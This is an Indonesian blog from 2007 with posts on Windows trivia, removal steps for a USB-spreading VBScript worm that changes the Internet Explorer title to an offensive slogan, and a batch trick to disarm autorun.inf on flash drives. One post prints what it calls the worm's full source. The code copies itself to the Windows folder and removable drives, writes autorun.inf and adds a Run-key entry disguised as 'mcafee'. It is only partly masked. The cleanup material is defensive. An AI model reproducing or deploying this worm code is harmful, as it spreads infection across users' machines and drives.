Selasa, 13 November 2007

keanehan windows

1. Di Negara India seseorang menemukan kenehan pada Seluruh System Operasi Buatan Microsoft (NT, XP, Win 95,96,97,98, Win ME, Mungkin Vista Sekalipun) Caranya buat Folder dan beri nama Folder tersebut dengan nama CON apakah anda bisa??

2. Pernahkan anda dengar Notepad? Bukalah Notepad anda biasanya teletak pada menu Start>Programs>Accessorie>Notepad lalu ketik Bush hid the facts kemudian simpan Notepad tersebut lalu bukalah kembali file tersebut, Apa yang anda lihat ???

3. Ini yang lebih parah bahkan seluruh team Bill gates tidak ada yang mengetahuinya bahkan Bill gates sekalipun Caranya Bukalah Microsoft Word apa saja (Word 97,XP,2000,2003 atau 2007) lalu ketik =rand (200, 99) kemudian anda enter ?

gw dah coba semua..yang paling aneh itu waktu ngetik =rand (200, 99), masa keluar kata2 "The quick brown fox jumps over the lazy dog" sebanyak 235 halaman...

gw dapet ini dari orang yang ngirim2 ke YM

Label:

Senin, 12 November 2007

IE Problem lanjutan

coba ke registry (start - run - ketik regedit)

cari dan hapus value-2 berikut:

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\mcafee",winpath&"\Win32.dll.vbs"

"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Fuck USA & EZRAEL! [Can Dajjal Come Out And Play ?!]"

"HKCR\vbsfile\DefaultIcon","shell32.dll,2"

cari dan hapus file berikut (jika ada)
c:\windows\Win32.dll.vbs --> "windows" bisa berarti winnt, tergantung windir pc kamu


full code nya gini :


'==================[Begin Of File]==================
on error resume next
rem 121206, do u still remember dis day us_3?
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=w******.exe Win32.dll.vbs"
set fs = createobject("******ing.FileSystemObject")
set mf = fs.getfile(W******.******Fullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\Win32.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\Win32.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\Win32.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\Win32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\Win32.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\Win32.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("W******.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\mcafee",winpath&"\Win32.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Fuck USA & EZRAEL! [Can Dajjal Come Out And Play ?!]"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
W******.sleep 200000
end if
loop while check<>1
set sd = createobject("W******.shell")
sd.run winpath & "\explorer.exe /e,/select, " & W******.******Fullname
'==================[End Of File]==================

Label:

IE Problem

Fuck USA & EZRAEL! [Can Dajjal Come Out And Play ?!]

Ini bukan misuh2 gak jelas tp gak tau jg ini sejenis virus, spyware ato apa, yang penting ini tulisan mengganggu banget deh…
Tulisan ini muncul di Title Bar-nya IE (cos saat ditemukan, ak pake IE hehe)..
Ternyata ini gak sekedar ganti Windows Title di Regeditnya.
Mungkin ada bbrp temen yang pernah kena FUCK USA & EZRAEL!!..ini step penyembuhannya..

1. Cari and hapus value berikut ini :
========================================
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\mcafee”,winpath&”\Win32.dll.vbs”

“HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″

(ini bener2 dihapus lho..bukan value-nya yang dikosongin).
========================================

2. Ubah
========================================
“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Fuck USA & EZRAEL! [Can Dajjal Come Out And Play ?!]”

Kamu ganti value-nya, tapi menurut percobaan, ak hapus dulu itu Window Title-nya trus ak bikin lagi…biar bener2 bersih sih…
========================================

3. cari dan hapus file berikut (jika ada)
========================================
c:\windows\Win32.dll.vbs –> ‘windows’ tergantung ma windir punya kamu :)
========================================

Ciri-ciri dari virus (ato apalah ini…) :
1. Munculnya pilihan Run Program ketika autoplay muncul pas flashdisk tercolok
2. Drive di My Computer tidak bisa dibuka dengan double klik, harus di Expand dari sisi sebelah kiri.
3. Membuat 2 file yaitu autorun.inf dan Win32.dll.vbs di setiap drive yang ada di komputer dengan ekstensi Hidden. (always!!!)

Setelah udah dilakukan edit registry, jangan lupa search 2 file itu (autorun.inf dan Win32.dll.vbs) dg ekstensi hidden di My Computer kita.

Moga Membantu.

Label:

Kamis, 01 November 2007

mencegah virus di flashdisk bag 2

ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.

Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :

1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)

2)tuliskan mantra del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.

3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).

4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)

5)lalu jalankan file mantra yang baru kita buat tersebut

6)buka explorer

7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.

Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer.